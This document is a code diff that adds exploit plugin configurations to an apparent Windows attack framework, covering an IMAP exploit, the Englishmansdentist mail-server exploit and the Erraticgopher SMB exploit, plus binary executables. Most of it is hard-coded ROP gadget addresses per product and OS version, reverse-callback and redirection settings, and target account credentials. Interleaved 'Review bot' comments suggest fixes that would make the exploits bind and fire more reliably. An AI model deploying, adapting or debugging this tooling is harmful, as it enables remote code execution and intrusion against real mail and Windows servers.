<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631058</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c0c4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP4" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a7d1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041dc67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c284</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a240</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004140dc</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP5" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a7d1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041dc67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631a78</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c654</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a240</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004140dc</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042AA81</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041DF07</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042D66C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60DDE56B</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60692948</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6014a394</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A4F2</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405227</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040522F</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004142AC</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
</paramchoice>
|
||||
|
||||
<!-- All plugins that accept a callback must have the Callback* parameters listed below, or their equivalents. -->
|
||||
|
||||
<!-- Callback/Callin parameters -->
|
||||
<paramchoice name="Direction" description="Callback from target or Callin to target">
|
||||
<default>Callback</default>
|
||||
<paramgroup name="Callback" description="Target calls back to plugin">
|
||||
<parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
|
||||
<parameter name="CallbackPort" description="Callback port" type="TcpPort" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
|
||||
</paramgroup>
|
||||
<paramgroup name="Callin" description="Target waits for call from plugin">
|
||||
<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
|
||||
<parameter name="ListenLocalPort" description="Port we connect to" type="TcpPort" required ="false"/>
|
||||
<parameter name="ListenWait" description="Timeout to wait before trying to connect in." type="S16">
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
|
||||
</inputparameters>
|
||||
|
||||
<outputparameters>
|
||||
<paramchoice name="Contract"
|
||||
description="The contract fulfilled by this plugin">
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name="StagedUpload" description="">
|
||||
<parameter name="ConnectedTcp"
|
||||
description="The connected socket"
|
||||
type="Socket"/>
|
||||
<parameter name="XorMask"
|
||||
description="Masking byte"
|
||||
type="U8"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</outputparameters>
|
||||
|
||||
<redirection>
|
||||
<!-- This is the tunnel used when we're "throwing" the exploit from the ROC -->
|
||||
<local
|
||||
protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="TargetIp"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
<!-- This is the tunnel used when we're "calling in" from the ROC to the exploited machine -->
|
||||
<local
|
||||
protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="ListenLocalPort"
|
||||
destaddr="TargetIp"
|
||||
destport="ListenPort"
|
||||
closeoncompletion="false"/>
|
||||
<!-- This is the tunnel we use when the exploit, after completing, "calls back" to the ROC -->
|
||||
<remote
|
||||
protocol="Tcp"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</redirection>
|
||||
|
||||
|
||||
<logic>
|
||||
<service name="imap">
|
||||
<bindtopath name="TargetPort" path="//service[name='imap']/port"/>
|
||||
</service>
|
||||
<bindtopath name="TargetIp" path="//identifier"/>
|
||||
</logic>
|
||||
</config>
|
BIN
windows/exploits/Emphasismine-3.4.0.exe
Normal file
BIN
windows/exploits/Emphasismine-3.4.0.exe
Normal file
Binary file not shown.
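--- a/windows/exploits/Emphasismine-3.4.0.fb
+++ b/windows/exploits/Emphasismine-3.4.0.fb
@@ -0,0 +1,7 @@
+<?xml version="1.0"?>
+<t:config id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
+name="Emphasismine"
+version="3.4.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+</t:config>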
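Review bot: This config omits the `configversion` attribute that the sibling .fb files in this commit carry (Englishmansdentist-1.2.0.0.fb and Erraticgopher-1.0.1.0.fb both declare `configversion` immediately after `version`), so anything that keys a plugin config on configversion will treat this one differently. If the loader requires it, the `t:config` element should gain `configversion="3.4.0.0"` after `version="3.4.0"`; if it is optional here, a one-line comment saying so would stop the next reader from filing the omission as a bug. The filename's three-part version (3.4.0, where the others use four parts) is consistent with the attribute being deliberately absent, but the file itself does not say.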
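--- a/windows/exploits/Englishmansdentist-1.2.0.0.fb
+++ b/windows/exploits/Englishmansdentist-1.2.0.0.fb
@@ -0,0 +1,8 @@
+<?xml version="1.0"?>
+<t:config id="2f4f9295a93af5a5e72580a71fc3832efd6cbdf1"
+name="Englishmansdentist"
+version="1.2.0"
+configversion="1.2.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+</t:config>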
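Review bot: There is no `t:touchlist` in this config, so nothing validates the target before the exploit fires, whereas Erraticgopher-1.0.1.0.fb in the same commit runs an RPC touch to resolve the target OS first. Englishmansdentist-1.2.0.0.xml picks hard-coded dbghelp.dll and olecnv32.dll base addresses from a manually chosen `Language` paramchoice, so an operator who selects the wrong language gets no pre-flight check and the ROP offsets presumably resolve to the wrong addresses on the mail server. If no touch exists for this target, the gap should at least be recorded inside `t:config`, e.g. `<!-- no touchlist: Language is chosen by hand and nothing verifies the DBGHELP/OLECNV32 bases before the exploit runs -->`.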
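--- a/windows/exploits/Englishmansdentist-1.2.0.0.xml
+++ b/windows/exploits/Englishmansdentist-1.2.0.0.xml
@@ -0,0 +1,137 @@
+<?xml version="1.0"?>
+<t:config id="2f4f9295a93af5a5e72580a71fc3832efd6cbdf1"
+name="Englishmansdentist"
+version="1.2.0"
+configversion="1.2.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:inputparameters>
+
+
+<!-- All plugins that accept a callback must have the Callback* parameters
+listed below, or their equivalents. -->
+
+<t:parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
+<t:parameter name="TargetPort" description="Target SMTP Mail Port to send email (typically 25)" type="TcpPort" default="25"/>
+
+<!-- Add TargetEmailAddressValue, EmailSubjectValue, EmailFromAddressValue, EmailBodyValue back in -->
+<t:parameter name="TargetEmailAddressValue" type="String" description="Target Email Address"/>
+<t:parameter name="EmailSubjectValue" type="String" description="Email Subject (make unique for later email deletion)"/>
+<t:parameter name="EmailFromAddressValue" type="String" description="Email From Address" default=""/>
+<t:parameter name="EmailBodyValue" type="String" description="Email Body" default=""/>
+
+<!-- Now using dbghelp.dll base addresses which are language dependent -->
+<t:paramchoice name="Language" description="Target OS Language">
+<t:paramgroup name="English" description="English OS Language">
+<t:parameter name="DBGHELP" description="" type="U32" value="0x6d580000" hidden="true"/>
+<t:parameter name="OLECNV32" description="" type="U32" value="0x71db0000" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="German" description="German OS Language">
+<t:parameter name="DBGHELP" description="" type="U32" value="0x6d790000" hidden="true"/>
+<t:parameter name="OLECNV32" description="" type="U32" value="0x71bc0000" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="Korean" description="Korean OS Language">
+<t:parameter name="DBGHELP" description="" type="U32" value="0x6d8e0000" hidden="true"/>
+<t:parameter name="OLECNV32" description="" type="U32" value="0x71c50000" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="Simplified_Chinese" description="Simplified Chinese OS Language">
+<t:parameter name="DBGHELP" description="" type="U32" value="0x6d830000" hidden="true"/>
+<t:parameter name="OLECNV32" description="" type="U32" value="0x71d00000" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="Traditional_Chinese" description="Traditional Chinese OS Language">
+<t:parameter name="DBGHELP" description="" type="U32" value="0x6d840000" hidden="true"/>
+<t:parameter name="OLECNV32" description="" type="U32" value="0x71d10000" hidden="true"/>
+</t:paramgroup>
+</t:paramchoice>
+
+<!-- Added next set of parameters outside of TargetExch since exchange version no longer matters -->
+<t:parameter name="dbghelp_return_01a0" description="" type="U32" value="0x00081cfd" hidden="true"/>
+<t:parameter name="dbghelp_virtual_alloc" description="" type="U32" value="0x00001104" hidden="true"/>
+<t:parameter name="dbghelp_pop_into_ecx" description="" type="U32" value="0x00019568" hidden="true"/>
+<t:parameter name="dbghelp_pop_into_esi" description="" type="U32" value="0x00013b71" hidden="true"/>
+<t:parameter name="dbghelp_mov_ptrecx_to_eax_ret" description="" type="U32" value="0x0005c464" hidden="true"/>
+<t:parameter name="dbghelp_mov_ecx_to_ptreax_ret8" description="" type="U32" value="0x00063f8b" hidden="true"/>
+<t:parameter name="dbghelp_jmp_eax" description="" type="U32" value="0x0002f71d" hidden="true"/>
+
+
+<t:parameter name="CallbackIp" description="Callback IP Address" type="IPv4"/>
+
+<t:parameter name="CallbackPort" description="Callback Port" type="TcpPort" default="0"/>
+
+<!-- Added CallbackLocalPort for redirection -->
+<t:parameter name="CallbackLocalPort" description="Local Callback Port" type="TcpPort" required="false"/>
+
+<t:parameter name="NetworkTimeout" description="Network Timeout (seconds). Use -1 for no timeout." type="S16" default="60"/>
+
+<!-- Added parameters independent of auth mode since everything must be authenticated -->
+<t:parameter name="TargetUserName" description="Username of Target Email Account" type="String"/>
+<t:parameter name="TargetUserPassword" description="Password of Target Email Account" type="String"/>
+
+<t:paramchoice name="MailCheckProtocol" description="Protocol to Trigger Target's Exploited Email">
+<t:paramgroup name="POP3" description="">
+<t:parameter name="MailCheckPort" description="Target POP3 Port" type="TcpPort" default="110"/>
+</t:paramgroup>
+<t:paramgroup name="IMAP" description="">
+<t:parameter name="MailCheckPort" description="Target IMAP Port" type="TcpPort" default="143"/>
+</t:paramgroup>
+
+<!-- Parameters for OWA -->
+<t:paramgroup name="OWA" description="">
+<t:paramchoice name="OWAMode" description="Protocol to Trigger Target's OWA mail" default="HTTPS">
+<t:paramgroup name="HTTP" description="Use HTTP only for OWA">
+<t:parameter name="MailCheckPort" description="Target OWA Port" type="TcpPort" default="80"/>
+</t:paramgroup>
+<t:paramgroup name="HTTPS" description="Use HTTPS only for OWA">
+<t:parameter name="MailCheckPort" description="Target OWA Port" type="TcpPort" default="443"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:parameter name="OWADelay"
+description="Delay in milliseconds between each OWA HTTP request"
+type="S16"
+default="3000"/>
+</t:paramgroup>
+</t:paramchoice>
+<t:parameter name="AuthCode" description="Egg Authentication Code (typically, don't change)" type="U32" default="0"/>
+</t:inputparameters>
+
+<t:outputparameters>
+<t:parameter name="Contract"
+description="Contract Fulfilled by This Plugin"
+type="String"
+value="StagedUpload"/>
+
+<!-- Added next three parameters per Jake -->
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to Target"
+type="Socket"/>
+<t:parameter name="AuthCode"
+description="Egg Authentication Code"
+type="U32"/>
+</t:outputparameters>
+
+<t:redirection>
+
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='smtp']/port"
+closeoncompletion="true"/>
+
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="MailCheckPort"
+destaddr="//identifier"
+destport="//service[name='pop3_imap_owa']/port"
+closeoncompletion="true"/>
+
+<t:remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+
+</t:redirection>
+</t:config>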
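Review bot: The second `t:local` tunnel in `t:redirection` resolves its destination with `destport="//service[name='pop3_imap_owa']/port"`, a single combined service name, while the `MailCheckProtocol` choice above selects POP3, IMAP or OWA separately and the first tunnel uses the plain `//service[name='smtp']/port`; unless the target model really defines one service called `pop3_imap_owa`, that XPath will not bind and the MailCheckPort tunnel has no destination. Either the service name should follow the chosen protocol, or the assumption should be written down next to the tunnel: `<!-- assumes the target model exposes a single service named pop3_imap_owa covering every MailCheckProtocol option -->`. Separately, `TargetUserPassword` is declared as a plain `String` with nothing distinguishing it from the other inputs, so if the framework echoes or records parameters this credential travels with them; a note on the parameter is warranted until a secret-typed parameter is available.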
BIN
windows/exploits/Englishmansdentist-1.2.0.exe
Normal file
BIN
windows/exploits/Englishmansdentist-1.2.0.exe
Normal file
Binary file not shown.
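--- a/windows/exploits/Erraticgopher-1.0.1.0.fb
+++ b/windows/exploits/Erraticgopher-1.0.1.0.fb
@@ -0,0 +1,26 @@
+<?xml version="1.0"?>
+<t:config id="690f669b2682fb96513cc33c5d6e7f8016081e63"
+name="Erraticgopher"
+version="1.0.1"
+configversion="1.0.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Rpctouch"
+displayname="RPC Touch"
+description="Touch to get Target OS"
+postmessage="ERGO requires Target OS">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:iparam name="Protocol" value="SMB"/>
+<t:oparam name="Target" value="Target"/>
+</t:plugin>
+<t:plugin name="Erraticgophertouch"
+displayname="ERGO Vulnerability Touch"
+postmessage="ERGO requires a vulnerable OS">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+</t:plugin>
+</t:touchlist>
+</t:config>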
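Review bot: The `Erraticgophertouch` plugin binds only TargetPort and TargetIp, while `Rpctouch` above also passes `NetworkTimeout`, so the vulnerability touch has no operator-controlled timeout and presumably falls back to its own default against a host that does not answer. Adding `<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>` to the second plugin would make the two touches behave consistently. Note also that the part of Erraticgopher-1.0.1.0.xml visible in this commit declares TargetIp, TargetPort, ConnectionDirection, CallbackPort and Target but no NetworkTimeout parameter; that file continues past what is shown, so confirm the parameter exists, otherwise the `value="NetworkTimeout"` binding in Rpctouch is dangling. The second plugin also lacks the `description` attribute the first one carries.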
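--- /dev/null
+++ b/windows/exploits/Erraticgopher-1.0.1.0.xml
@@ -0,0 +1,223 @@
+<?xml version="1.0"?>
+<t:config id="690f669b2682fb96513cc33c5d6e7f8016081e63"
+name="Erraticgopher"
+version="1.0.1"
+configversion="1.0.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:inputparameters>
+<t:parameter name="TargetIp"
+xdevmap="TARGET_IP_V4_ADDRESS"
+description="Target IP Address"
+type="IPv4"/>
+
+<t:parameter name="TargetPort"
+xdevmap="TARGET_PORT"
+description="Target port"
+type="TcpPort"
+default="445"/>
+
+<t:paramchoice
+name="ConnectionDirection"
+xdevmap="TARGET_CONNECTION_DIRECTION"
+description="Egg callback (Reverse callback) or Listener (Forward callback)"
+default="0">
+<t:paramgroup name="0" description="Reverse callback">
+<t:parameter name="CallbackIp"
+xdevmap="EXPLOIT_CALLBACK_IP_V4_ADDRESS"
+description="Callback IP Address"
+type="IPv4"/>
+</t:paramgroup>
+<t:paramgroup name="1" description="Forward callback">
+</t:paramgroup>
+</t:paramchoice>
+<t:parameter name="CallbackPort"
+xdevmap="EXPLOIT_CALLBACK_PORT"
+description="Callback port or call in port"
+type="TcpPort"/>
+
+
+<t:paramchoice
+name="Target"
+xdevmap="TARGET_PLATFORM"
+description="Target Operating System Version">
+<!-- 2000 SP4 - Doesn't appear to allow access to Dimsvc over the 'browser' pipe, only over the 'router'
+pipe. So the interface will only be reachable with credentials. Exploit does not currently support
+credential use.
+<t:paramgroup name="WIN2K_SP4" description="Windows 2000 SP4">
+<t:parameter name="EggOffset" description="" type="U32" value="0x28" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x06D0" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x00E0" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x7CA0C02F" hidden="true"/>
+</t:paramgroup>
+-->
+<!-- XP SP2 - Can't find the lock handle on the stack to cleanup, so exploiting will disable RRAS service.
+One option would be to patch in the location of the lock, but that is language dependent. Probably
+not too many XP SP2 RRAS boxes out there, so leaving it.
+<t:paramgroup name="WINXP_SP2" description="Windows XP SP2">
+<t:parameter name="EggOffset" description="" type="U32" value="0xE4" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0x0FFD0000" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x06D0" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x019C" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x000134D3" hidden="true"/>
+<t:parameter name="RwAddress" description="" type="U32" value="0x00024588" hidden="true"/>
+<t:parameter name="ZeroEax" description="" type="U32" value="0x0001095F" hidden="true"/>
+<t:parameter name="MovEspEax" description="" type="U32" value="0x000135E8" hidden="true"/>
+<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00010278" hidden="true"/>
+<t:parameter name="SkipJunk" description="" type="U32" value="0x00014502" hidden="true"/>
+<t:parameter name="SkipJunkPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
+<t:parameter name="GetVProtIndex" description="" type="U32" value="0x0000A08D" hidden="true"/>
+<t:parameter name="vProtIndex" description="" type="U32" value="0x00000089" hidden="true"/>
+<t:parameter name="vProtPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
+<t:parameter name="SetupEbx" description="" type="U32" value="0x00014505" hidden="true"/>
+<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
+<t:parameter name="JumpEbx" description="" type="U32" value="0x00014D7C" hidden="true"/>
+<t:parameter name="JumpEbxPadding" description="" type="U32" value="0x00000010" hidden="true"/>
+<t:parameter name="Ret14" description="" type="U32" value="0x000069A8" hidden="true"/>
+<t:parameter name="JumpEsp" description="" type="U32" value="0x00018F89" hidden="true"/>
+</t:paramgroup>
+-->
+<t:paramgroup name="XPSP3" description="Windows XP SP3">
+<t:parameter name="EggOffset" description="" type="U32" value="0xE4" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x0690" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x0190" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00014E7A" hidden="true"/>
+<t:parameter name="RwAddress" description="" type="U32" value="0x00032020" hidden="true"/>
+<t:parameter name="ZeroEax" description="" type="U32" value="0x000121DE" hidden="true"/>
+<t:parameter name="MovEspEax" description="" type="U32" value="0x00014F88" hidden="true"/>
+<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x0001137E" hidden="true"/>
+<t:parameter name="SkipJunk" description="" type="U32" value="0x00015EA3" hidden="true"/>
+<t:parameter name="SkipJunkPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
+<t:parameter name="GetVProtIndex" description="" type="U32" value="0x0000A965" hidden="true"/>
+<t:parameter name="vProtIndex" description="" type="U32" value="0x00000089" hidden="true"/>
+<t:parameter name="vProtPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
+<t:parameter name="SetupEbx" description="" type="U32" value="0x00015EA5" hidden="true"/>
+<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
+<t:parameter name="JumpEbx" description="" type="U32" value="0x00011740" hidden="true"/>
+<t:parameter name="JumpEbxPadding" description="" type="U32" value="0x00000010" hidden="true"/>
+<t:parameter name="Ret14" description="" type="U32" value="0x0000692d" hidden="true"/>
+<t:parameter name="JumpEsp" description="" type="U32" value="0x00011899" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="W2K3SP0" description="Windows 2003 SP0">
+<t:parameter name="EggOffset" description="" type="U32" value="0x28" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x00E0" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x0FFEF4C9" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="W2K3SP1" description="Windows 2003 SP1">
+<t:parameter name="EggOffset" description="" type="U32" value="0xC4" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x0170" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00015BD8" hidden="true"/>
+<t:parameter name="RwAddress" description="" type="U32" value="0x0002BA08" hidden="true"/>
+<t:parameter name="ZeroEax" description="" type="U32" value="0x00012CE6" hidden="true"/>
+<t:parameter name="MovEspEax" description="" type="U32" value="0x00015CF4" hidden="true"/>
+<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00011EB9" hidden="true"/>
+<t:parameter name="SkipJunk" description="" type="U32" value="0x00015D8B" hidden="true"/>
+<t:parameter name="GetVProtIndex" description="" type="U32" value="0x000092A1" hidden="true"/>
+<t:parameter name="vProtIndex" description="" type="U32" value="0x0000008F" hidden="true"/>
+<t:parameter name="vProtPadding" description="" type="U32" value="0x00000008" hidden="true"/>
+<t:parameter name="SetupEbx" description="" type="U32" value="0x00015D8D" hidden="true"/>
+<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
+<t:parameter name="JumpEbx" description="" type="U32" value="0x0001227B" hidden="true"/>
+<t:parameter name="Ret14" description="" type="U32" value="0x0000694E" hidden="true"/>
+<t:parameter name="JumpEsp" description="" type="U32" value="0x000123D4" hidden="true"/>
+</t:paramgroup>
+<t:paramgroup name="W2K3SP2" description="Windows 2003 SP2">
+<t:parameter name="EggOffset" description="" type="U32" value="0xC4" hidden="true"/>
+<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
+<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
+<t:parameter name="LockStackOffset" description="" type="U32" value="0x0170" hidden="true"/>
+<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00015F8B" hidden="true"/>
+<t:parameter name="RwAddress" description="" type="U32" value="0x000312C0" hidden="true"/>
+<t:parameter name="ZeroEax" description="" type="U32" value="0x00012F87" hidden="true"/>
+<t:parameter name="MovEspEax" description="" type="U32" value="0x000160A4" hidden="true"/>
+<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00012121" hidden="true"/>
+<t:parameter name="SkipJunk" description="" type="U32" value="0x0001613B" hidden="true"/>
+<t:parameter name="GetVProtIndex" description="" type="U32" value="0x00009391" hidden="true"/>
+<t:parameter name="vProtIndex" description="" type="U32" value="0x0000008F" hidden="true"/>
+<t:parameter name="vProtPadding" description="" type="U32" value="0x00000008" hidden="true"/>
+<t:parameter name="SetupEbx" description="" type="U32" value="0x0001613D" hidden="true"/>
+<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
+<t:parameter name="JumpEbx" description="" type="U32" value="0x000124E3" hidden="true"/>
+<t:parameter name="Ret14" description="" type="U32" value="0x00009946" hidden="true"/>
+<t:parameter name="JumpEsp" description="" type="U32" value="0x0001263C" hidden="true"/>
+</t:paramgroup>
+</t:paramchoice>
+</t:inputparameters>
+
+
+<t:outputparameters>
+<t:parameter name="Contract"
+description="The contract fulfilled by this plugin"
+type="String"
+value="StagedUpload"/>
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to target"
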